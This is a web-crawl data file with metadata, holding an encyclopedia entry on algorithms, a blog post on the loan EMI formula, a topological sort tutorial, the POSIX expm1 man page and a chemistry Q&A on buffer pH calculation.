by column is such an algorithm). The notion of a problem “in the general form” is explicated with the help of the concept of a mass problem. A mass problem is specified by a series of separate, individual problems and consists in the requirement to find a general method—that is, an algorithm—for their solution. Thus, the problem of the numerical solution of equations of a given type and the problem of automatic translation are mass problems: the individual problems constituting them are, in the first case, problems of the numerical solutions of individual equations of a given type and, in the second, problems of the translation of individual phrases. The role of mass problems determines both the significance and the sphere of application of the algorithm concept. Mass problems are extremely characteristic of and important in mathematics: for example, in algebra mass problems arise in the verification of algebraic equations of various types; in mathematical logic, we find mass problems for recognizing the derivability of propositions from given axioms; and so on. In the case of mathematical logic, the concept of the algorithm is all the more so essential because it is the basis of calculus—the central concept of mathematical logic. This concept serves as a generalization and explication of the intuitive concepts of “derivation” and “proof.” Establishing the unsolvability of some mass problem (say the problem of recognizing the truth or demonstrability of some logicomathematical language)—that is, the absence of a unified algorithm that permits finding solutions to all individual problems of a given set—is an important cognitive act which shows that in the solution of concrete individual problems it is fundamentally necessary to have specific methods for each such problem. The existence of unsolvable mass problems is thus a sign of the inexhaustibility of the cognitive process.\n\nSubstantive phenomena which underlay the formation of the algorithm concept long occupied an important position in science. From very ancient times, many problems of mathematics consisted in the search for constructive methods of one kind or another. This search, especially intensified with the advent of convenient symbolism and with the realization that certain sought-for methods cannot, in principle, be found (the problem of squaring the circle and the like), was a powerful factor in the development of scientific knowledge. Realization of the impossibility of solving problems by direct calculation led to the creation, in the 19th century, of the set-theoretic concept. Only after a period of turbulent development of this concept, during which the question of constructive methods in the modern sense of the term did not arise at all, did it become possible, in the middle of the 20th century, to turn once again to questions of constructivity, this time at a new level, enriched by the emergent concept of the algorithm. It was this concept which formed the basis of a special constructive trend in mathematics.\n\nThe very word algorithm derives from algorithmic a Latin transliteration of the Arabic name of al-Khwarizmi, a ninth-century mathematician from the district of Khorezm. In medieval Europe, the term algorism (algorithm) was used for the decimal positional number system and the art of calculating in it, since it was through a 12th-century Latin translation of al-Khwarizmi’s treatise that Europeans first became acquainted with the positional system of notation.\n\nStructure of the algorithmic process. The algorithmic process is one of sequential transformation of constructive entities; it proceeds in discrete steps, each one of which consists in the replacement of a given constructive entity with another. Thus, in applying the algorithm I to the word baaba, we get a succession of words baaba, abaaba, baabab, and so forth. If, say, we apply the algorithm of subtraction by column to the pair <307, 49>, the following succession of constructive entities appears:",
null,
"In this series of sequential constructive objects, each succeeding constructive object is fully determined, within the limits of the given algorithm, by its immediate predecessor. In a stricter approach, it is also assumed that the transition from every constructive object to the one immediately following it is sufficiently “elementary” in the sense that the transformation, in one step, of the preceding constructive object into the following one is of local character. The transformation does not embrace the whole constructive object, but only a portion of it delineated beforehand for the given algorithm, and the transformation itself is determined not by the whole preceding constructive object, but only by this limited portion.\n\nThus, along with sets of possible initial data and possible results, there exists for any algorithm a set of intermediate results which make up the working medium in which the algorithmic process develops. For I, all three sets coincide, but not for the subtraction-by-column algorithm: the possible initial data are pairs of numbers, the possible results are numbers (all in the decimal system), while intermediate results are complex fractions of the type",
null,
"where q is the notation of the number in the decimal system, r is a similar notation or empty word, and ρ is the notation of a number in the decimal system with an allowance for dots over certain digits.\n\nThe functioning of the algorithm begins with a preparatory step in which the possible initial datum is transformed into the initial member of the sequence of intermediate results; this transformation takes place on the basis of a special “rule of beginning” which forms part of the algorithm under consideration. This rule, for I, consists in the application of an identity transformation and, for the subtraction algorithm, in the replacement of the pair <a, b> with the expression",
null,
"Then the “rule of direct processing” is applied, which effects the successive transformation of each arising intermediate result into its successor. These transformations continue until a certain test, to which each intermediate result is subjected as it appears, indicates that a given intermediate result is conclusive; this test is applied on the basis of a special “rule of completion.” For example, for I, the rule of completion consists in verifying whether the intermediate result begins with aa. If the rule of completion does not produce the stop signal for any intermediate result, then the rule of direct processing is either applicable to every arising intermediate result and the algorithmic process continues indefinitely or it is inapplicable to a certain intermediate result and the process is terminated without result. Finally, the final result is extracted from the conclusive intermediate result also on the basis of a special rule; for Entity, this extraction consists in discarding the first two a’s and, for the subtraction algorithm, in discarding everything except the bottom line of digits. In many important cases, the rule of beginning and the rule of extraction of result both assign identical transformations and therefore are not formulated separately. Thus, for every algorithm it is possible to isolate seven (not independent!) parameters that characterize it: (1) the set of possible initial data, (2) the set of possible results, (3) the set of intermediate results, (4) the rule of beginning, (5) the rule of direct processing, (6) the rule of completion, and (7) the rule of extraction of result.\n\n“Refinement” of the concept of the algorithm. Further “refinements” of the concept of the algorithm are possible, and these, strictly speaking, lead to a certain narrowing of the concept. Every such refinement consists in a precise description of a certain class for each of the seven parameters mentioned above—a class within which the given parameter can change. The selection of these classes is what distinguishes one refinement from another. In many refinements, all classes except two—the class of sets of intermediate results and the class of rules of direct processing—are chosen individually; that is, all parameters, except the two exceptions mentioned, are rigidly fixed. Since the seven parameters determine a certain algorithm unambiguously, the choice of the seven classes of variation of these parameters determines a certain class of algorithms. However, such a choice is properly referred to as a “refinement” only if we are convinced that for an arbitrary algorithm having permissible (by the given choice) sets of possible initial data and possible results it is possible to designate an equivalent algorithm taken from the class of algorithms defined by the given choice. This conviction is formulated for each refinement as a basic hypothesis, which, at the present level of our ideas on the matter, cannot be the subject of mathematical proof.\n\nThe first refinements of the type described were proposed in 1936 by the American mathematician E. L. Post and the English mathematician A. M. Turing. Also well known are the refinements formulated by the Soviet mathematicians A. A. Markov and A. N. Kolmogorov. The latter proposed treating constructive entities as topological complexes of a specific type; this offered the possibility of explicating the property of “localness” of a transformation For each of the proposed refinements, the corresponding main hypothesis is in good agreement with practice. Favoring this hypothesis is the fact that, as can be demonstrated, all proposed refinements are in a certain natural sense equivalent to one another.\n\nAs an example (in modernized form), we may take the refinement proposed by Turing. In order to specify a Turing algorithm, we must indicate (1) pairwise nonintersecting alphabets B, D, C, with letter ɑ isolated in D and letters and ω in C and (2) a set of pairs of the form <, ƞT̲q> where p, qC, ξ, η∊∪D, and T is one of the signs −, 0, +, assuming that in this set (called a program) there are no two pairs with identical first members. The parameters of the algorithm are assigned as follows: possible initial data and possible results are words in B; possible intermediate results are words in BDC containing not more than one letter from C. The rule of beginning: the initial word P is translated into the word λαPλ. The rule of completion: the final result is the intermediate result containing ω. The rule of extraction of result: the result is decreed to be the sequence of all those letters of the conclusive intermediate result which follows ω and precedes the first letter not contained in B. The rule of direct processing, which translates A into A’ consists in the following; we adjoin the letter λ to A on the right and on the left; then in the word thus formed, we replace the portion of form ∊ρξ, where ρ∊C, with the word Q by the following rule: in the program, we seek the pair having the first member ρξ; let the second member of this pair be η Tq; if T is −, then Q = q∊η; if T is 0. then Q-∊qy; if T is+, then Q=€ηg. The word appearing after this replacement is A’.\n\nV. A. USPENSKII\n\n## algorithm\n\n[′al·gə‚rith·əm]\n(mathematics)\nA set of well-defined rules for the solution of a problem in a finite number of steps.\nMcGraw-Hill Dictionary of Scientific & Technical Terms, 6E, Copyright © 2003 by The McGraw-Hill Companies, Inc.\n\n## Algorithm\n\nA well-defined procedure to solve a problem. The study of algorithms is a fundamental area of computer science. In writing a computer program to solve a problem, a programmer expresses in a computer language an algorithm that solves the problem, thereby turning the algorithm into a computer program. See Computer programming\n\n#### Operation\n\nAn algorithm generally takes some input, carries out a number of effective steps in a finite amount of time, and produces some output. An effective step is an operation so basic that it is possible, at least in principle, to carry it out using pen and paper. In computer science theory, a step is considered effective if it is feasible on a Turing machine or any of its equivalents. A Turing machine is a mathematical model of a computer used in an area of study known as computability, which deals with such questions as what tasks can be algorithmically carried out and what cannot. See Automata theory\n\nMany computer programs deal with a substantial amount of data. In such applications, it is important to organize data in appropriate structures to make it easier or faster to process the data. In computer programming, the development of an algorithm and the choice of appropriate data structures are closely intertwined, and a decision regarding one often depends on knowledge of the other. Thus, the study of data structures in computer science usually goes hand in hand with the study of related algorithms. Commonly used elementary data structures include records, arrays, linked lists, stacks, queues, trees, and graphs.\n\n#### Applications\n\nMany algorithms are useful in a broad spectrum of computer applications. These elementary algorithms are widely studied and considered an essential component of computer science. They include algorithms for sorting, searching, text processing, solving graph problems, solving basic geometric problems, displaying graphics, and performing common mathematical calculations.\n\nSorting arranges data objects in a specific order, for example, in numerically ascending or descending orders. Internal sorting arranges data stored internally in the memory of a computer. Simple algorithms for sorting by selection, by exchange, or by insertion are easy to understand and straightforward to code. However, when the number of objects to be sorted is large, the simple algorithms are usually too slow, and a more sophisticated algorithm, such as heap sort or quick sort, can be used to attain acceptable performance. External sorting arranges stored data records.\n\nSearching looks for a desired data object in a collection of data objects. Elementary searching algorithms include linear search and binary search. Linear search examines a sequence of data objects one by one. Binary search adopts a more sophisticated strategy and is faster than linear search when searching a large array. A collection of data objects that are to be frequently searched can also be stored as a tree. If such a tree is appropriately structured, searching the tree will be quite efficient.\n\nA text string is a sequence of characters. Efficient algorithms for manipulating text strings, such as algorithms to organize text data into lines and paragraphs and to search for occurrences of a given pattern in a document, are essential in a word processing system. A source program in a high-level programming language is a text string, and text processing is a necessary task of a compiler. A compiler needs to use efficient algorithms for lexical analysis (grouping individual characters into meaningful words or symbols) and parsing (recognizing the syntactical structure of a source program). See Software engineering\n\nA graph is useful for modeling a group of interconnected objects, such as a set of locations connected by routes for transportation. Graph algorithms are useful for solving those problems that deal with objects and their connections—for example, determining whether all of the locations are connected, visiting all of the locations that can be reached from a given location, or finding the shortest path from one location to another.\n\nMathematical algorithms are of wide application in science and engineering. Basic algorithms for mathematical computation include those for generating random numbers, performing operations on matrices, solving simultaneous equations, and numerical integration. Modern programming languages usually provide predefined functions for many common computations, such as random number generation, logarithm, exponentiation, and trigonometric functions.\n\nIn many applications, a computer program needs to adapt to changes in its environment and continue to perform well. An approach to make a computer program adaptive is to use a self-organizing data structure, such as one that is reorganized regularly so that those components most likely to be accessed are placed where they can be most efficiently accessed. A self-modifying algorithm that adapts itself is also conceivable. For developing adaptive computer programs, biological evolution has been a source of ideas and has inspired evolutionary computation methods such as genetic algorithms. See Genetic algorithms\n\nCertain applications require a tremendous amount of computation to be performed in a timely fashion. An approach to save time is to develop a parallel algorithm that solves a given problem by using a number of processors simultaneously. The basic idea is to divide the given problem into subproblems and use each processor to solve a subproblem. The processors usually need to communicate among themselves so that they may cooperate. The processors may share memory, through which they can communicate, or they may be connected by communication links into some type of network such as a hypercube. See Concurrent processing, Multiprocessing, Supercomputer\n\nMcGraw-Hill Concise Encyclopedia of Engineering. © 2002 by The McGraw-Hill Companies, Inc.\n\n## algorithm\n\n1. a logical arithmetical or computational procedure that if correctly applied ensures the solution of a problem\n2. Logic Maths a recursive procedure whereby an infinite sequence of terms can be generated\nCollins Discovery Encyclopedia, 1st edition © HarperCollins Publishers 2005\n\n## algorithm\n\n(algorithm, programming)\nA detailed sequence of actions to perform to accomplish some task. Named after the Iranian mathematician, Mohammed Al-Khawarizmi.\n\nTechnically, an algorithm must reach a result after a finite number of steps, thus ruling out brute force search methods for certain problems, though some might claim that brute force search was also a valid (generic) algorithm. The term is also used loosely for any sequence of actions (which may or may not terminate).\n\nPaul E. Black's Dictionary of Algorithms, Data Structures, and Problems.\n\n## algorithm\n\nA set of ordered steps for solving a problem, such as a mathematical formula or the instructions in a program. The terms algorithm and \"program logic\" are synonymous as both refer to a sequence of steps to solve a problem. However, an algorithm often implies a more complex problem rather than the input-process-output logic of typical business software. See encryption algorithm.\nCopyright © 1981-2019 by The Computer Language Company Inc. All Rights reserved. THIS DEFINITION IS FOR PERSONAL USE ONLY. All other reproduction is strictly prohibited without permission from the publisher.\nReferences in periodicals archive ?\nFigure 2(a) shows a sample XML document and its corresponding fragment of XML streams stored in the eleTable generated during the createINLAB encoding algorithm. Likewise, figure 2(b) depicts the fragment of PCTable generated.\nRegarding analysis of TEK exchange in PKMv1, we know that if attacker manipulated the value of encoding set in the middle of the road, SS would probably be led to a direction in order not to use identification strategy and/or use weak encoding algorithm. To solve this problem, SS should send its security facilities and capability in SA-TEK-Request message.\nJiang, et al, \"Virtual view synthesis oriented fast depth video encoding algorithm,\" 2010 2nd International Conf.\nBy combining this with the \"ultra high quality and ultra low delay encoding algorithm,\" high quality video can be implemented through low bit rate transmissions.\nFor example, compared with the pure source multicast scenarios of the spanning tree with n number of nodes, the encoding ratio (n - 2) of the Prufer sequence algorithm used in DSM can be slightly better than our LCRS-based serialized path encoding algorithm (n -1 + number of branch delimiters).\nIn the H.264 encoding algorithm, Bigasoft utilizes the new advanced CPU command to better take advantages of CPU processing thus increasing the H.264 encoding speed to 5X faster and reserving the video and audio quality.\nThe IP Link 200A is designed to allow broadcasters to interconnect studios and remote locations, including transmitter sites, using the AES67 standard and any of today's encoding algorithms across wide-area IP networks.\nCABAC is notable for providing much better compression than most other entropy encoding algorithms used in video encoding, and it is one of the key elements that provide the H.264/AVC encoding scheme with better compression capability than its predecessors.\nPractical network coding schemes are aiming to increase throughput; what is vital is to design encoding algorithms and make decisions.\nIn earlier works, there were many bus encoding algorithms aiming to reduce the power dissipation on interfaces by mapping the information on IOs or signals to a form which has less transition activity than the original, such as the bus-invert encoding [12, 13], gray code , serial T0, and combined bus-invert and T0 technology .\nTraditionally accustomed to broadcaster-scheduled \"appointment viewing\", consumers today demand \"prime time on my time.\" Moreover, the fixed location viewing in the family room, or perhaps on a PC, is replaced by growing expectations of a proliferation of mobile devices capable of receiving streamed IP video, encouraged by more efficient encoding algorithms and streaming protocols.\n\nSite: Follow: Share:\nOpen / Close"
] | [
null,
"https://img.tfd.com/ggse/ae/gsed_0001_0001_0_img0055.png",
null,
"https://img.tfd.com/ggse/7e/gsed_0001_0001_0_img0056.png",
null,
"https://img.tfd.com/ggse/d5/gsed_0001_0001_0_img0057.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9307323,"math_prob":0.9376649,"size":24411,"snap":"2020-34-2020-40","text_gpt3_token_len":4822,"char_repetition_ratio":0.16036382,"word_repetition_ratio":0.011840411,"special_character_ratio":0.18733358,"punctuation_ratio":0.10432802,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97867644,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,10,null,10,null,10,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-28T12:41:27Z\",\"WARC-Record-ID\":\"<urn:uuid:85d786ba-81c0-49f5-b507-3b5dcbefc279>\",\"Content-Length\":\"75062\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:406fb836-6f67-40cf-a9e6-d54b0987b5bb>\",\"WARC-Concurrent-To\":\"<urn:uuid:ac3a2b72-b729-4834-b79c-78dcefc80a38>\",\"WARC-IP-Address\":\"85.195.124.227\",\"WARC-Target-URI\":\"https://encyclopedia2.thefreedictionary.com/Encoding+Algorithm\",\"WARC-Payload-Digest\":\"sha1:BWSUE2UHHUOS3G6AX3WTKV7WLVPA3VKT\",\"WARC-Block-Digest\":\"sha1:FSFKQXA3YULZ5BFSWEAYZHE65RH5ESUF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401600771.78_warc_CC-MAIN-20200928104328-20200928134328-00076.warc.gz\"}"} |
https://www.banking24seven.com/loan-interest-formula-will-help-you-calculate-your-emi-with-ease/ | [
"",
null,
"",
null,
"You Might Be Interested In\n\nThe loan is an amount of money that is borrowed from a lender that is expected to be paid back with interest. The one who borrows the loan is the borrower and the lender can be an individual, bank or any financial institution. The lender pays the entire amount on behalf of the borrower. The borrower, on the other hand, pays monthly installments to the lender towards the principal amount and interest too over the amount. Interest is the cost of using someone else’s money. It is seen as a compensation to the lender who takes the risk to lend you the money in simple terms. There is a way to determine the loan interest formula for your EMI.\nThe amount of interest on your loan depends on three things\n-The amount of loan\n-The interest rate\n-A time duration of the loan\nA long term loan or a higher interest means that the borrower has to pay more to repay the loan. Most banks and financial institution use compound interest to determine your loan interest.\nIn the day of computers and laptops, an excel spreadsheet is the easiest way to calculate the loan interest formula. The loan interest formula is calculated by PMT which includes three variables, these are a rate of interest (rate), number of periods (per) and, lastly, the value of the loan or present value (PV).\nEMI = PMT (rate,per,PV)\nThe rate of interest used in the formula should be the monthly rate\nThe number of EMI’s is represented by the number of periods.\nThe result is usually in the red or in negative which is indicative of the cash outflow of the borrower.\nWhen using a calculator or just plain mathematics the formula for calculating EMI is as follows\nEMI = [P x R x (1+R)^N]/[(1+R)^N-1], where P stands for the loan amount or principal, R is the interest rate per month [if the interest rate per annum is 11%, then the rate of interest will be 11/(12 x 100)], and N is the number of monthly installments. When you use the above formula, you will get the same result that you will get in the Excel spreadsheet.\nEach EMI repays a part of the due amount i.e. the principal and the interest due on the loan amount. With the help of a loan interest formula, you can plan wisely and meet your financial needs. It’s easier to plan in advance and pay off the loan amount in due time to avoid getting into a debt trap.\n\nWe use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it. OK Read Privacy & Cookies Policy"
] | [
null,
"http://b.scorecardresearch.com/p",
null,
"https://www.banking24seven.com/wp-content/themes/soledad/images/penci-holder.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9463097,"math_prob":0.97091013,"size":2999,"snap":"2021-43-2021-49","text_gpt3_token_len":656,"char_repetition_ratio":0.17963272,"word_repetition_ratio":0.41970804,"special_character_ratio":0.21540514,"punctuation_ratio":0.07540984,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.995243,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-19T03:47:01Z\",\"WARC-Record-ID\":\"<urn:uuid:972c7ef7-cf7d-4c86-8979-424ba48a144f>\",\"Content-Length\":\"155394\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a8755cb1-d40e-4c70-833b-a2d269eccdae>\",\"WARC-Concurrent-To\":\"<urn:uuid:4b296314-a6c9-4cf6-818d-f9e27da810f9>\",\"WARC-IP-Address\":\"159.65.156.155\",\"WARC-Target-URI\":\"https://www.banking24seven.com/loan-interest-formula-will-help-you-calculate-your-emi-with-ease/\",\"WARC-Payload-Digest\":\"sha1:RUS4EQSDB5E43SYBRP7ZCUFTAJK2GJTN\",\"WARC-Block-Digest\":\"sha1:QE6STUSQ5C3J5F4OWKJNYM62ZMIN4DNC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585231.62_warc_CC-MAIN-20211019012407-20211019042407-00413.warc.gz\"}"} |
https://thecshandbook.com/Topological_Sorting | [
"## Introduction\n\nPrerequisites: Graph Theory, Depth First Search\n\nA topological sort or topological order of a directed graph is an order in which every node comes after its ancestors.",
null,
"For example topological orders could be:\n\n• (A, B, C, D, E, F, G)\n• (B, A, D, C, F, E, G)\n• (B, A, D, G, F, C, E)\n\nBut (B, A, C, F, D, E, G) is not a topological ordering because D is an ancestor of F and it comes after F.\n\n## Implementation\n\nTopological sort can implemented in O(n) time using DFS for a directed acyclic graph (a digraph with no cycles). How it works:\n\n2. Pick any unmarked node.\n3. Get the DFS preordering from that node for unvisited nodes.\n5. Mark every node that has been visited.",
null,
"Example:\n\n• Pick C\n• DFS preorder from C is (C,E)"
] | [
null,
"https://thecshandbook.com/public_html/img/uploads/topsort.png",
null,
"https://thecshandbook.com/public_html/img/uploads/topsort.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8758359,"math_prob":0.69846046,"size":1276,"snap":"2023-40-2023-50","text_gpt3_token_len":365,"char_repetition_ratio":0.17924528,"word_repetition_ratio":0.02734375,"special_character_ratio":0.28683385,"punctuation_ratio":0.18412699,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9730745,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T05:46:53Z\",\"WARC-Record-ID\":\"<urn:uuid:44943bf5-383f-4bdb-8444-9d0059fb807d>\",\"Content-Length\":\"8903\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e71120a5-28a6-461c-942e-67cee738798a>\",\"WARC-Concurrent-To\":\"<urn:uuid:9f337033-ba38-42f2-a68d-85f81f1d45d2>\",\"WARC-IP-Address\":\"104.21.86.71\",\"WARC-Target-URI\":\"https://thecshandbook.com/Topological_Sorting\",\"WARC-Payload-Digest\":\"sha1:QTP35K6BQWSGOGXBYZQGDOGSJPQCGC4M\",\"WARC-Block-Digest\":\"sha1:APADCNKSZFMYXDY2RJQABWD57ZGTUDBM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100276.12_warc_CC-MAIN-20231201053039-20231201083039-00029.warc.gz\"}"} |
https://reposcope.com/man/en/3p/expm1 | [
"Linux repositories inspector\n\n# expm1(3p)\n\nIEEE/The Open Group\n2013\nAliases: expm1f(3p), expm1l(3p)\n\n### man-pages\n\nLinux kernel and C library user-space interface documentation\n\n### man-pages-posix\n\nPOSIX Manual Pages\n\n## PROLOG\n\nThis manual page is part of the POSIX Programmer’s Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.\n\n## NAME\n\nexpm1, expm1f, expm1l — compute exponential functions\n\n## SYNOPSIS\n\n```#include <math.h>\n\ndouble expm1(double x);\nfloat expm1f(float x);\nlong double expm1l(long double x);\n```\n\n## DESCRIPTION\n\nThe functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1-2008 defers to the ISO C standard.\nThese functions shall compute ex-1.0.\nAn application wishing to check for error situations should set errno to zero and call feclearexcept(FE_ALL_EXCEPT) before calling these functions. On return, if errno is non-zero or fetestexcept(FE_INVALID | FE_DIVBYZERO | FE_OVERFLOW | FE_UNDERFLOW) is non-zero, an error has occurred.\n\n## RETURN VALUE\n\nUpon successful completion, these functions return ex-1.0.\nIf the correct value would cause overflow, a range error shall occur and expm1(), expm1f(), and expm1l() shall return the value of the macro HUGE_VAL, HUGE_VALF, and HUGE_VALL, respectively.\nIf x is NaN, a NaN shall be returned.\nIf x is ±0, ±0 shall be returned.\nIf x is -Inf, -1 shall be returned.\nIf x is +Inf, x shall be returned.\nIf x is subnormal, a range error may occur\nand x should be returned.\nIf x is not returned, expm1(), expm1f(), and expm1l() shall return an implementation-defined value no greater in magnitude than DBL_MIN, FLT_MIN, and LDBL_MIN, respectively.\n\n## ERRORS\n\nThese functions shall fail if:\n Range Error The result overflows. If the integer expression (math_errhandling & MATH_ERRNO) is non-zero, then errno shall be set to [ERANGE]. If the integer expression (math_errhandling & MATH_ERREXCEPT) is non-zero, then the overflow floating-point exception shall be raised.\nThese functions may fail if:\n Range Error The value of x is subnormal. If the integer expression (math_errhandling & MATH_ERRNO) is non-zero, then errno shall be set to [ERANGE]. If the integer expression (math_errhandling & MATH_ERREXCEPT) is non-zero, then the underflow floating-point exception shall be raised.\nThe following sections are informative.\n\nNone.\n\n## APPLICATION USAGE\n\nThe value of expm1(x) may be more accurate than exp(x)-1.0 for small values of x.\nThe expm1() and log1p() functions are useful for financial calculations of ((1+x)n-1)/x, namely:\n```\nexpm1(n * log1p(x))/x\n```\nwhen x is very small (for example, when calculating small daily interest rates). These functions also simplify writing accurate inverse hyperbolic functions.\nFor IEEE Std 754-1985 double, 709.8 < x implies expm1( x) has overflowed.\nOn error, the expressions (math_errhandling & MATH_ERRNO) and (math_errhandling & MATH_ERREXCEPT) are independent of each other, but at least one of them must be non-zero.\n\nNone.\n\nNone."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.76889795,"math_prob":0.91949797,"size":4192,"snap":"2019-51-2020-05","text_gpt3_token_len":1031,"char_repetition_ratio":0.11389685,"word_repetition_ratio":0.11488673,"special_character_ratio":0.23449427,"punctuation_ratio":0.1432258,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9874893,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-06T12:26:23Z\",\"WARC-Record-ID\":\"<urn:uuid:2afd2ccc-3979-44e2-9356-068063916af1>\",\"Content-Length\":\"10745\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a4d38a2f-bca9-4599-a991-cd27e7c83892>\",\"WARC-Concurrent-To\":\"<urn:uuid:4cc34034-e995-44fd-a810-5fb3a78fa1f9>\",\"WARC-IP-Address\":\"80.79.17.135\",\"WARC-Target-URI\":\"https://reposcope.com/man/en/3p/expm1\",\"WARC-Payload-Digest\":\"sha1:LHG72DLABC74P6LSGSJD3XCWSF7LHTCQ\",\"WARC-Block-Digest\":\"sha1:3LMWMPOH6TB2KPTSZOF6NPGF7YEYFR27\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540488620.24_warc_CC-MAIN-20191206122529-20191206150529-00150.warc.gz\"}"} |
https://socratic.org/questions/597cae97b72cff300c577dac | [
"# If a buffer contains \"0.110 M\" weak base and \"0.440 M\" of the weak conjugate acid, what is the \"pH\"? The \"pK\"_b is 4.96.\n\nJul 30, 2017\n\n$\\text{pH} = 8.44$\n\n#### Explanation:\n\nThis looks like a job for the Henderson - Hasselbalch equation, which for a weak base/conjugate acid buffer looks like this\n\n\"pH\" = 14 - overbrace([\"p\"K_b + log( ([\"conjugate acid\"])/([\"weak base\"]))])^(color(blue)(\"the pOH of the buffer solution\"))\n\nAs you know, you have\n\n$\\text{p} {K}_{b} = - \\log \\left({K}_{b}\\right)$\n\nIn your case, you know that the buffer contains $\\text{0.110 M}$ of the weak base and $\\text{0.440 M}$ of its conjugate acid, so even without doing any calculations, you should be able to say that the $\\text{pOH}$ of the buffer will be higher than the $\\text{p} {K}_{b}$ of the weak base.\n\nIn other words, the $\\text{pH}$ of the buffer will be lower than $14 - \\text{p} {K}_{b}$, what you would get for a $\\text{pOH}$ equal to the $\\text{p} {K}_{b}$ of the weak base.\n\nPlug in your values into the Henderson - Hasselbalch equation to find\n\n\"pH\" = 14 - [-log(1.1 * 10^(-5)) + log((0.440 color(red)(cancel(color(black)(\"M\"))))/(0.110color(red)(cancel(color(black)(\"M\")))))]\n\n$\\textcolor{\\mathrm{da} r k g r e e n}{\\underline{\\textcolor{b l a c k}{\\text{pH} = 8.44}}}$\n\nThe answer is rounded to two decimal places, the number of sig figs you have for the base dissociation constant.\n\nJul 30, 2017\n\nStefan has a good answer, but I thought I'd give another approach to this. For buffers (i.e. weak acid + conjugate base, weak base + conjugate acid), the Henderson-Hasselbalch equation applies.\n\nTo make it so I only have to know one Henderson-Hasselbalch equation, I use the ${\\text{pK}}_{a}$ one and recall the relationships to interconvert between ${\\text{pK}}_{a}$, ${\\text{pK}}_{b}$, $\\text{pH}$, and $\\text{pOH}$.\n\n\"pH\" = \"pK\"_a + log\\frac([\"A\"^(-)])([\"HA\"])\n\nUsing the idea that ${\\text{pK\"_a + \"pK}}_{b} = 14$, we get:\n\n$- \\log \\left({K}_{b}\\right) = {\\text{pK}}_{b} = - \\log \\left(1.1 \\times {10}^{- 5}\\right) = 4.96$\n\n$\\implies {\\text{pK}}_{a} = 14 - 4.96 = 9.04$\n\nAnd thus, noting the difference in notation (treating the base as ${\\text{A}}^{-}$ or $\\text{B}$ and the conjugate acid as $\\text{HA}$ or ${\\text{BH}}^{+}$), the $\\text{pH}$ is alternatively found as:\n\ncolor(blue)(\"pH\") = 9.04 + log ((\"0.110 M\")/(\"0.440 M\"))\n\n$= 9.04 - \\log 4 = \\textcolor{b l u e}{8.44}$\n\nAnd this makes physical sense, as we started with a weak base, whose conjugate acid dissociates less (${K}_{a} < {K}_{b}$ if ${K}_{b} > {10}^{- 7}$ at ${25}^{\\circ} \\text{C}$ and $\\text{1 atm}$).\n\nFurthermore, there is a higher concentration of conjugate acid than the weak base. So, we should expect the $\\text{pH}$ to be basic, but also more acidic than the ${\\text{pK}}_{a}$ of the conjugate acid.\n\nAPPENDIX\n\nAnd just so you see, this gives the same equation Stefan has. Recall that:\n\n• At ${25}^{\\circ} \\text{C}$ and $\\text{1 atm}$, ${\\text{pK\"_a + \"pK\"_b = 14 = \"pK}}_{w}$\n• $\\log \\left(\\frac{a}{b}\\right) = - \\log \\left(\\frac{b}{a}\\right)$\n\nTherefore:\n\n\"pH\" = (14 - \"pK\"_b) + log\\frac([\"A\"^(-)])([\"HA\"])\n\n= (14 - \"pK\"_b) - log\\frac([\"HA\"])([\"A\"^(-)])\n\n= 14 - [\"pK\"_b + log\\frac([\"HA\"])([\"A\"^(-)])]\n\nwhich is what Stefan used.\n\nWith slightly changed notation, and knowing that $\\text{pH\" + \"pOH} = 14$ at ${25}^{\\circ} \\text{C}$ and $\\text{1 atm}$, we can get the other form of the Henderson-Hasselbalch equation:\n\n\"pH\" = 14 - overbrace([\"pK\"_b + log\\frac([\"BH\"^(+)])([\"B\"])])^(\"pOH\")\n\n$= 14 - \\text{pOH}$\n\nThus,\n\n$\\overline{\\underline{| \\stackrel{\\text{ \")(\" \" \"pOH\" = \"pK\"_b + log\\frac([\"BH\"^(+)])([\"B\"])\" }}{|}}}$"
] | [
null
